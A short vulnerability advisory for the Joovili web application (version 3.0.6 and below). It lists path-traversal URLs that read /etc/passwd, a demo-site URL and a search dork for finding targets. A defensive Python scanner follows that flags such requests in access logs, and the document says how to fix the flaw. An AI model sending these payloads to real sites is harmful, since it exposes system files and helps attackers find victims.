Joovili versions 3.0.6 and below suffer from a remote file disclosure vulnerability in joovili.images.php.
904076a35da3187803d4e79e803ad471d3fa704f8c49084eb079a2842b1f0996
found by EcHoLL
version: 2.***
include/images.inc.php?picture=../../../../../../../../etc/passwd&thumbnail=FALSE
include/images.inc.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE
version: 3.**
joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE
joovili.images.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE
demo
http://demo.joovili.com/include/joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE
dork: powered by joovili
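
A defender-side check for the requests listed above, as an added example that is not part of the original advisory or of Joovili's code: it scans web-server access-log lines for requests to the two image scripts whose `picture` value resolves outside the image directory. The log lines are constructed, and `IMAGE_ROOT` is an assumed stand-in path.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

SCRIPTS = ("images.inc.php", "joovili.images.php")  # script names from the advisory
IMAGE_ROOT = "/images"  # assumption: stand-in for the directory pictures are served from
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample access log (combined format); client IPs are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /include/joovili.images.php'
    '?picture=members/42.jpg&thumbnail=TRUE HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /include/joovili.images.php'
    '?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE HTTP/1.1" 200 1873',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /include/images.inc.php'
    '?picture=../..//../..//../..//../..//etc/passwd&thumbnail=FALSE HTTP/1.1" 200 1873',
]

def picture_escapes_root(value):
    """Return True if `value` resolves to a path outside IMAGE_ROOT."""
    # Decode a bounded number of times so percent-encoded forms are normalized first.
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = value.replace("\\", "/")
    # normpath collapses both "../" and the "..//" form seen in the advisory.
    resolved = posixpath.normpath(posixpath.join(IMAGE_ROOT, value))
    return not (resolved == IMAGE_ROOT or resolved.startswith(IMAGE_ROOT + "/"))

def scan(lines):
    """Return (line_number, client, picture_value) for each suspicious request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith(SCRIPTS):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get("picture", []):
            if picture_escapes_root(value):
                hits.append((number, line.split()[0], value))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same resolve-then-compare test is what a server-side fix needs: canonicalize the requested path and refuse it unless the result is still inside the image directory.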